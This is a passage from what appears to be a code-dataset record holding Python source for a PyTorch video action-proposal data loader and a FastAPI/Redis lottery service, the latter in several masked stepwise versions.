gt_bbox.append([tmp_start,tmp_end])\n \n gt_bbox=np.array(gt_bbox)\n gt_xmins=gt_bbox[:,0]\n gt_xmaxs=gt_bbox[:,1]\n\n gt_lens=gt_xmaxs-gt_xmins\n gt_len_small=np.maximum(self.temporal_gap,self.boundary_ratio*gt_lens) # starting region 和 ending region的长度\n gt_start_bboxs=np.stack((gt_xmins-gt_len_small/2,gt_xmins+gt_len_small/2),axis=1) # starting region\n gt_end_bboxs=np.stack((gt_xmaxs-gt_len_small/2,gt_xmaxs+gt_len_small/2),axis=1) # ending region\n\n # anchors = np.stack((anchor_xmin, anchor_xmax), 1) # 代表每一个snippet的范围\n match_score_action=[]\n # 给每一个位置计算TEM的三个概率值,但是from 0 to 99 效率不高吧 这种方法生成会有大量的无效操作,特别是gt较少的时候,可以后期优化\n for jdx in range(len(anchor_xmin)):\n match_score_action.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx],anchor_xmax[jdx],gt_xmins,gt_xmaxs)))\n match_score_start=[]\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx],anchor_xmax[jdx],gt_start_bboxs[:,0],gt_start_bboxs[:,1])))\n match_score_end=[]\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx],anchor_xmax[jdx],gt_end_bboxs[:,0],gt_end_bboxs[:,1])))\n match_score_action = torch.Tensor(match_score_action)\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_action,match_score_start,match_score_end #3个长度为100的概率序列\n\n def _ioa_with_anchors(self,anchors_min,anchors_max,box_min,box_max):\n len_anchors=anchors_max-anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n def _ioa(self, anchors, gts):\n len_anchors = anchors[:,1] - anchors[:,0]\n int_min = np.maximum(anchors[:,0],gts[:,0])\n int_max = np.minimum(anchors[:,1],gts[:,1])\n np.maximum(np.expand_dims(np.arange(1, 5), 1), np.arange(3))\n\n\n \n def __len__(self):\n return 
len(self.video_list)\n\n\nclass ProposalDataSet(data.Dataset):\n def __init__(self,opt,subset=\"train\"):\n \n self.subset=subset\n self.mode = opt[\"mode\"]\n if self.mode == \"train\": # 测试与前推时的样本数量是不一样的\n self.top_K = opt[\"pem_top_K\"]\n else:\n self.top_K = opt[\"pem_top_K_inference\"]\n self.video_info_path = opt[\"video_info\"]\n self.video_anno_path = opt[\"video_anno\"]\n self.feature_path = opt[\"feature_path\"] # '特征存放位置'\n self.temporal_scale = opt[\"temporal_scale\"] # 时域长度 归一化到100\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n # 因为某些视频的特征可能不存在,或者遭到了损坏\n for video in self.video_list:\n if not os.path.exists(self.feature_path + \"csv_mean_\" + str(self.temporal_scale) + \"/\" + video + \".csv\"):\n print(\"video :{} feature csv is not existed\".format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n # 删除已知的错误样本\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print(\"del \" + v +' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n\n print (\"After check: csv \\n %s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n \n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path) #读取信息\n anno_database= load_json(self.video_anno_path) # 读取相关真值信息\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name=anno_df.video.values[i]\n video_info=anno_database[video_name]\n video_subset=anno_df.subset.values[i]\n if self.subset == \"full\":\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print (\"%s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n\n def __len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf=pandas.read_csv(\"./output/PGM_proposals/\"+video_name+\".csv\") # 读取proposal\n pdf=pdf[:self.top_K]\n video_feature = 
numpy.load(\"./output/PGM_feature/\" + video_name+\".npy\") # read BSP feature for proposals\n video_feature = video_feature[:self.top_K,:]\n #print len(video_feature),len(pdf)\n video_feature = torch.Tensor(video_feature)\n\n if self.mode == \"train\":\n video_match_iou = torch.Tensor(pdf.match_iou.values[:]) # choose IOU as gt 已经在TEM inference阶段计算好\n return video_feature,video_match_iou # [bs, 32] [bs]\n else:\n # 取得proposals的 starting location, ending location, starting score, ending score\n video_xmin =pdf.xmin.values[:]\n video_xmax =pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return video_feature,video_xmin,video_xmax,video_xmin_score,video_xmax_score\n\n\n\ndef load_json(file):\n with open(file) as json_file:\n json_data = json.load(json_file)\n return json_data\n\n\nclass BMN_VideoDataSet(data.Dataset):\n def __init__(self, opt, subset=\"train\"):\n self.temporal_scale = opt[\"temporal_scale\"] # 100\n self.temporal_gap = 1. 
/ self.temporal_scale\n self.subset = subset\n self.mode = opt[\"mode\"]\n self.feature_path = opt[\"feature_path\"]\n self.video_info_path = opt[\"video_info\"]\n self.video_anno_path = opt[\"video_anno\"]\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n # 因为某些视频的特征可能不存在,或者遭到了损坏\n for video in self.video_list:\n if not os.path.exists(self.feature_path + \"csv_mean_\" + str(self.temporal_scale) + \"/\" + video + \".csv\"):\n print(\"video :{} feature csv is not existed\".format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n # 删除已知的错误样本\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print(\"del \" + v +' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n\n print (\"After check: csv \\n %s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print(\"%s subset video numbers: %d\" % (self.subset, len(self.video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index) # video feature [400, 100]\n if self.mode == \"train\":\n # [D, T] [100, 100] [T=100] [T=100]\n match_score_start, match_score_end, confidence_score = self._get_train_label(index, self.anchor_xmin,\n self.anchor_xmax)\n return video_data,confidence_score, match_score_start, match_score_end\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx # start locaiton 归一化之后的\n for jdx in range(1, 
self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx # ending location 加上duration\n tmp_match_window.append([xmin, xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map) # 100x100x2 最后一个2代表BM map上面每一个代表的candidate proposals所代表的时域范围 [start, duration, 2]\n match_map = np.transpose(match_map, [1, 0, 2]) # [0.00,0.01] [0.01,0.02] [0.02,0.03].....[0.99,0.100] [duration, start, 2]\n match_map = np.reshape(match_map, [-1, 2]) # [0,2] [1,3] [2,4].....[99,101] # duration x start [100*100, 2]\n self.match_map = match_map # duration is same in row, start is same in col\n self.anchor_xmin = [self.temporal_gap * (i-0.5) for i in range(self.temporal_scale)] # 每一个 snippet 的 开始时间\n self.anchor_xmax = [self.temporal_gap * (i+0.5) for i in range(1, self.temporal_scale + 1)] # 每一个 snippet的结束时刻\n # 注意从产生特征的角度来看,上面的anchor min 和anchor max 应该和BSN一样,不减去0.5,\n # 比如第一个特征的就是由0-16帧图片产生,最后一个特征就是-16到-1的图片产生,应该 不用减去那个0.5\n # 之后可以通过实验验证一下是否影响精度 相反,我觉得上面的match map应该加上0,5 因为每个snippet的中央区域在中间 但是因为是离线处理,所以不应该纠结那么多\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + \"csv_mean_\" + str(self.temporal_scale) + \"/\" + video_name + \".csv\")\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second # there are some frames not used\n video_labels = video_info['annotations'] # the measurement is second, not frame\n\n ##############################################################################################\n # change the measurement from second to 
percentage\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)): #对于每个Proposal\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] / corrected_second), 0) # 归一化时间\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors( # 每一个候选的proposals计算IOU\n self.match_map[:, 0], self.match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map,\n [self.temporal_scale, self.temporal_scale]) # [100, 100] 相当于BM map的label\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map) # [num_gt, 100, 100]\n gt_iou_map = np.max(gt_iou_map, axis=0) # 取最大的IOU作为gt [100, 100]\n gt_iou_map = torch.Tensor(gt_iou_map)\n ##############################################################################################\n\n ####################################################################################################\n # generate R_s and R_e # 构建增强后的start region和ending region\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap # np.maximum(self.temporal_gap, self.boundary_ratio * gt_lens) # 直接用绝对大小代表增强区域的大小\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + gt_len_small / 2), axis=1) # 产生增强之后的两个区域\n #####################################################################################################\n\n ##########################################################################################################\n # calculate the ioa for all timestamp # 计算两个概率序列的真值\n match_score_start = []\n for jdx in range(len(anchor_xmin)): # 针对每一个anchor都计算与gt之间的ioa作为真值\n match_score_start.append(np.max(\n ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0], gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in 
range(len(anchor_xmin)):\n match_score_end.append(np.max(\n ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n ############################################################################################################\n\n return match_score_start, match_score_end, gt_iou_map # 三个真值 [100], [100], [100,100]\n\n def __len__(self):\n return len(self.video_list)\n\ndef ioa_with_anchors(anchors_min, anchors_max, box_min, box_max):\n # calculate the overlap proportion between the anchor and all bbox for supervise signal,\n # the length of the anchor is 0.01\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n\ndef iou_with_anchors(anchors_min, anchors_max, box_min, box_max):\n \"\"\"Compute jaccard score between a box and the anchors.\n \"\"\"\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.)\n union_len = len_anchors - inter_len + box_max - box_min\n # print inter_len,union_len\n jaccard = np.divide(inter_len, union_len)\n return jaccard\n\nif __name__ == '__main__':\n import opts\n opt = opts.parse_opt()\n opt = vars(opt)\n # test dataset for BMN network\n train_loader = torch.utils.data.DataLoader(BMN_VideoDataSet(opt, subset=\"train\"),\n batch_size=opt[\"bmn_batch_size\"], shuffle=True,\n num_workers=8, pin_memory=True)\n for a,b,c,d in train_loader:\n print(a.shape,b.shape,c.shape,d.shape)\n break",
"step-ids": [
17,
21,
28,
31,
32
]
}
|
[
17,
21,
28,
31,
32
] |
from typing import Optional,List
from fastapi import FastAPI
from pydantic import BaseModel, Field
from redisqueue import RedisQueue,MyRedis
import random
class Award(BaseModel):
    """One prize tier of a lottery rule: its display name and stock count."""
    name: str  # award display name (used as the redis hash field / queue entry)
    count: int  # how many units of this award can be won
class Item(BaseModel):
    """Request body for creating a lottery rule (POST /creat)."""
    # BUG FIX: the original kwarg was misspelled `max_lenght`, so pydantic
    # silently ignored it and the 300-character limit was never enforced.
    luckname: str = Field(..., title="抽奖规则名称", max_length=300)
    total: int = Field(..., title="抽奖总人数", gt=0)  # total number of draws in the pool
    award: Optional[List[Award]] = Field(None, title="奖品列表")  # may be omitted entirely
    other: str = Field(..., title="参与奖或者未中奖")  # filler entry for non-winning draws
app = FastAPI()
class ResSuccess(BaseModel):
    """Generic success envelope: ret == 0 plus an optional data payload."""
    ret: int = 0
    # BUG FIX: the original class body contained the bare name `data`, which
    # raises NameError the moment the class body executes, so the module could
    # not even be imported. Declare it as an optional payload field instead.
    data: Optional[dict] = None
@app.get('/')
def read_root():
    """Root endpoint: returns a static greeting (useful as a liveness check)."""
    greeting = {"Hello": "World"}
    return greeting
@app.post(
    '/delect',
    tags = ["抽奖接口"],
    summary = "删除抽奖规则"
)
def delect(name: str):
    """Remove an entry from the queue backing the named lottery rule.

    Always answers with a success envelope, even if the queue was empty.
    """
    rq = RedisQueue(name)
    # BUG FIX: the original wrote `if rq.qsize:` which tests the bound method
    # object itself (always truthy) instead of calling it -- the code elsewhere
    # in this file calls `rq.qsize()`. Call it so the pop only runs when the
    # queue is non-empty.
    if rq.qsize():
        # NOTE(review): lpop removes a single element, not the whole rule's
        # queue -- presumably "delete" should drain it entirely; confirm the
        # intended RedisQueue semantics.
        rq.lpop(name)
    return {
        'ret': 0,
        'msg': "删除成功"
    }
@app.post(
    '/creat',
    tags = ['抽奖接口'],
    summary="创建抽奖规则"
)
def creat(item: Item):
    """
    通过该接口可以创建一个抽奖规则

    Builds a shuffled draw pool of `item.total` entries (award names plus the
    `item.other` filler), pushes it onto the rule's redis queue, and stores the
    per-award remaining counts in a redis hash keyed by `item.luckname`.
    """
    myredis = MyRedis()
    rq = RedisQueue(item.luckname)
    # Refuse to overwrite an existing rule; the caller must delete it first.
    if rq.qsize():
        return {
            "ret": 500,
            "msg": "该抽奖已经存在,请删除后重试"
        }
    # Robustness: `Item.award` is Optional -- treat a missing list as empty
    # instead of crashing with TypeError on iteration. (Also dropped a dead
    # `result` assignment and debug prints from the original.)
    awardlist = item.award if item.award else []
    lucklist = []   # one entry per draw, e.g. the award name repeated `count` times
    luckdict = {}   # award name -> remaining count, persisted as a redis hash
    for ward in awardlist:
        luckdict[ward.name] = ward.count
        lucklist.extend([ward.name] * ward.count)
    # Pad the pool with the consolation/no-prize entry up to the total size.
    # Robustness: only pad when positive; the original stored a negative count
    # in the hash when the awards exceeded `item.total`.
    othercount = item.total - len(lucklist)
    if othercount > 0:
        luckdict[item.other] = othercount
        lucklist = lucklist + [item.other] * othercount
    random.shuffle(lucklist)
    for luck in lucklist:
        rq.put(luck)
    myredis.hmset(item.luckname, luckdict)
    return {
        'ret': 0,
        'msg': "succses"
    }
@app.get('/luck', tags = ["抽奖接口"], summary="抽奖接口")
def luck(id: int, luckname: str):
    """
    开始抽奖

    Pops one entry from the rule's draw queue for participant `id`, records
    the result in the `<luckname>_winner` hash, and decrements the remaining
    stock of the drawn award.
    """
    queue = RedisQueue(luckname)
    redis_cli = MyRedis()
    winner_key = luckname + "_winner"
    # One draw per participant: refuse a second attempt by the same id.
    if redis_cli.hexists(winner_key, id):
        return {
            "ret": 0,
            "msg": "您已经抽过了,不能再抽了"
        }
    prize = queue.get_nowait()
    if not prize:
        # Pool exhausted -- nothing left to draw.
        return {
            "ret": 0,
            'data': {
                "flag": 0,
                "msg": "奖抽完了",
            }
        }
    # Record the winner and decrement the remaining stock for that prize.
    redis_cli.hset(winner_key, id, prize)
    redis_cli.hincrby(luckname, prize, -1)
    return {
        "ret": 0,
        'data': {
            "flag": 1,
            "msg": "恭喜你中奖了",
            "award": prize
        }
    }
@app.get('/luckman', tags = ["抽奖接口"], summary="查看中奖名单")
def luckman(luckname: str):
    """Return the winner mapping (participant id -> award) for one rule."""
    winners = MyRedis().hgetall(luckname + "_winner")
    print(winners)
    return {
        "ret": 0,
        "data": winners
    }
@app.get('/remaining', tags = ["抽奖接口"], summary="查看剩余奖品列表")
def Remaining(luckname: str):
    """Return the remaining prize counts (award name -> count) for one rule."""
    leftovers = MyRedis().hgetall(luckname)
    print(leftovers)
    return {
        "ret": 0,
        "data": leftovers
    }
|
normal
|
{
"blob_id": "4550ed971eef36badf46a44adcc593324a5292cf",
"index": 2637,
"step-1": "<mask token>\n\n\nclass Award(BaseModel):\n name: str\n count: int\n\n\nclass Item(BaseModel):\n luckname: str = Field(..., title='抽奖规则名称', max_lenght=300)\n total: int = Field(..., title='抽奖总人数', gt=0)\n award: Optional[List[Award]] = Field(None, title='奖品列表')\n other: str = Field(..., title='参与奖或者未中奖')\n\n\n<mask token>\n\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n\n<mask token>\n\n\n@app.post('/delect', tags=['抽奖接口'], summary='删除抽奖规则')\ndef delect(name: str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {'ret': 0, 'msg': '删除成功'}\n\n\n@app.post('/creat', tags=['抽奖接口'], summary='创建抽奖规则')\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print('ok')\n if rq.qsize():\n return {'ret': 500, 'msg': '该抽奖已经存在,请删除后重试'}\n result = {'ret': 0, 'item': item}\n awardlist = item.award\n lucklist = []\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n myredis.hmset(item.luckname, luckdict)\n result = {'ret': 0, 'msg': 'succses'}\n return result\n\n\n@app.get('/luck', tags=['抽奖接口'], summary='抽奖接口')\ndef luck(id: int, luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname + '_winner'\n if myredis.hexists(winner, id):\n return {'ret': 0, 'msg': '您已经抽过了,不能再抽了'}\n award = rd.get_nowait()\n if award:\n myredis.hset(winner, id, award)\n myredis.hincrby(luckname, award, -1)\n result = {'ret': 0, 'data': {'flag': 1, 'msg': '恭喜你中奖了', 'award':\n award}}\n else:\n result = {'ret': 0, 'data': {'flag': 0, 'msg': '奖抽完了'}}\n return result\n\n\n<mask token>\n\n\n@app.get('/remaining', tags=['抽奖接口'], 
summary='查看剩余奖品列表')\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {'ret': 0, 'data': remainlist}\n",
"step-2": "<mask token>\n\n\nclass Award(BaseModel):\n name: str\n count: int\n\n\nclass Item(BaseModel):\n luckname: str = Field(..., title='抽奖规则名称', max_lenght=300)\n total: int = Field(..., title='抽奖总人数', gt=0)\n award: Optional[List[Award]] = Field(None, title='奖品列表')\n other: str = Field(..., title='参与奖或者未中奖')\n\n\n<mask token>\n\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n\n<mask token>\n\n\n@app.post('/delect', tags=['抽奖接口'], summary='删除抽奖规则')\ndef delect(name: str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {'ret': 0, 'msg': '删除成功'}\n\n\n@app.post('/creat', tags=['抽奖接口'], summary='创建抽奖规则')\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print('ok')\n if rq.qsize():\n return {'ret': 500, 'msg': '该抽奖已经存在,请删除后重试'}\n result = {'ret': 0, 'item': item}\n awardlist = item.award\n lucklist = []\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n myredis.hmset(item.luckname, luckdict)\n result = {'ret': 0, 'msg': 'succses'}\n return result\n\n\n@app.get('/luck', tags=['抽奖接口'], summary='抽奖接口')\ndef luck(id: int, luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname + '_winner'\n if myredis.hexists(winner, id):\n return {'ret': 0, 'msg': '您已经抽过了,不能再抽了'}\n award = rd.get_nowait()\n if award:\n myredis.hset(winner, id, award)\n myredis.hincrby(luckname, award, -1)\n result = {'ret': 0, 'data': {'flag': 1, 'msg': '恭喜你中奖了', 'award':\n award}}\n else:\n result = {'ret': 0, 'data': {'flag': 0, 'msg': '奖抽完了'}}\n return result\n\n\n@app.get('/luckman', tags=['抽奖接口'], summary='查看中奖名单')\ndef 
luckman(luckname: str):\n myredis = MyRedis()\n winner = luckname + '_winner'\n winnerlist = myredis.hgetall(winner)\n print(winnerlist)\n return {'ret': 0, 'data': winnerlist}\n\n\n@app.get('/remaining', tags=['抽奖接口'], summary='查看剩余奖品列表')\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {'ret': 0, 'data': remainlist}\n",
"step-3": "<mask token>\n\n\nclass Award(BaseModel):\n name: str\n count: int\n\n\nclass Item(BaseModel):\n luckname: str = Field(..., title='抽奖规则名称', max_lenght=300)\n total: int = Field(..., title='抽奖总人数', gt=0)\n award: Optional[List[Award]] = Field(None, title='奖品列表')\n other: str = Field(..., title='参与奖或者未中奖')\n\n\napp = FastAPI()\n\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n\n@app.get('/')\ndef read_root():\n return {'Hello': 'World'}\n\n\n@app.post('/delect', tags=['抽奖接口'], summary='删除抽奖规则')\ndef delect(name: str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {'ret': 0, 'msg': '删除成功'}\n\n\n@app.post('/creat', tags=['抽奖接口'], summary='创建抽奖规则')\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print('ok')\n if rq.qsize():\n return {'ret': 500, 'msg': '该抽奖已经存在,请删除后重试'}\n result = {'ret': 0, 'item': item}\n awardlist = item.award\n lucklist = []\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n myredis.hmset(item.luckname, luckdict)\n result = {'ret': 0, 'msg': 'succses'}\n return result\n\n\n@app.get('/luck', tags=['抽奖接口'], summary='抽奖接口')\ndef luck(id: int, luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname + '_winner'\n if myredis.hexists(winner, id):\n return {'ret': 0, 'msg': '您已经抽过了,不能再抽了'}\n award = rd.get_nowait()\n if award:\n myredis.hset(winner, id, award)\n myredis.hincrby(luckname, award, -1)\n result = {'ret': 0, 'data': {'flag': 1, 'msg': '恭喜你中奖了', 'award':\n award}}\n else:\n result = {'ret': 0, 'data': {'flag': 0, 'msg': '奖抽完了'}}\n return 
result\n\n\n@app.get('/luckman', tags=['抽奖接口'], summary='查看中奖名单')\ndef luckman(luckname: str):\n myredis = MyRedis()\n winner = luckname + '_winner'\n winnerlist = myredis.hgetall(winner)\n print(winnerlist)\n return {'ret': 0, 'data': winnerlist}\n\n\n@app.get('/remaining', tags=['抽奖接口'], summary='查看剩余奖品列表')\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {'ret': 0, 'data': remainlist}\n",
"step-4": "from typing import Optional, List\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel, Field\nfrom redisqueue import RedisQueue, MyRedis\nimport random\n\n\nclass Award(BaseModel):\n name: str\n count: int\n\n\nclass Item(BaseModel):\n luckname: str = Field(..., title='抽奖规则名称', max_lenght=300)\n total: int = Field(..., title='抽奖总人数', gt=0)\n award: Optional[List[Award]] = Field(None, title='奖品列表')\n other: str = Field(..., title='参与奖或者未中奖')\n\n\napp = FastAPI()\n\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n\n@app.get('/')\ndef read_root():\n return {'Hello': 'World'}\n\n\n@app.post('/delect', tags=['抽奖接口'], summary='删除抽奖规则')\ndef delect(name: str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {'ret': 0, 'msg': '删除成功'}\n\n\n@app.post('/creat', tags=['抽奖接口'], summary='创建抽奖规则')\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print('ok')\n if rq.qsize():\n return {'ret': 500, 'msg': '该抽奖已经存在,请删除后重试'}\n result = {'ret': 0, 'item': item}\n awardlist = item.award\n lucklist = []\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n myredis.hmset(item.luckname, luckdict)\n result = {'ret': 0, 'msg': 'succses'}\n return result\n\n\n@app.get('/luck', tags=['抽奖接口'], summary='抽奖接口')\ndef luck(id: int, luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname + '_winner'\n if myredis.hexists(winner, id):\n return {'ret': 0, 'msg': '您已经抽过了,不能再抽了'}\n award = rd.get_nowait()\n if award:\n myredis.hset(winner, id, award)\n myredis.hincrby(luckname, award, -1)\n result = {'ret': 0, 
'data': {'flag': 1, 'msg': '恭喜你中奖了', 'award':\n award}}\n else:\n result = {'ret': 0, 'data': {'flag': 0, 'msg': '奖抽完了'}}\n return result\n\n\n@app.get('/luckman', tags=['抽奖接口'], summary='查看中奖名单')\ndef luckman(luckname: str):\n myredis = MyRedis()\n winner = luckname + '_winner'\n winnerlist = myredis.hgetall(winner)\n print(winnerlist)\n return {'ret': 0, 'data': winnerlist}\n\n\n@app.get('/remaining', tags=['抽奖接口'], summary='查看剩余奖品列表')\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {'ret': 0, 'data': remainlist}\n",
"step-5": "from typing import Optional,List\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel, Field\n\nfrom redisqueue import RedisQueue,MyRedis\nimport random\n\nclass Award(BaseModel):\n name: str\n count: int\n\nclass Item(BaseModel):\n luckname: str = Field(...,title=\"抽奖规则名称\",max_lenght = 300)\n total: int = Field(...,title=\"抽奖总人数\",gt=0)\n award: Optional[List[Award]] = Field(None,title=\"奖品列表\")\n other: str = Field(...,title=\"参与奖或者未中奖\")\napp = FastAPI()\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n@app.get('/')\ndef read_root():\n return {\"Hello\":\"World\"}\n\n@app.post(\n '/delect', \n tags = [\"抽奖接口\"],\n summary = \"删除抽奖规则\"\n )\ndef delect(name:str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {\n 'ret':0,\n 'msg':\"删除成功\"\n }\n\n@app.post(\n '/creat',\n tags = ['抽奖接口'],\n summary=\"创建抽奖规则\"\n)\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print(\"ok\")\n if rq.qsize():\n return {\n \"ret\":500,\n \"msg\":\"该抽奖已经存在,请删除后重试\"\n }\n result = {\"ret\":0, \"item\":item}\n awardlist = item.award\n lucklist =[]\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n \n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n \n myredis.hmset(item.luckname,luckdict)\n\n result = {\n 'ret': 0,\n 'msg': \"succses\"\n }\n return result\n\n@app.get('/luck', tags = [\"抽奖接口\"], summary=\"抽奖接口\")\ndef luck(id: 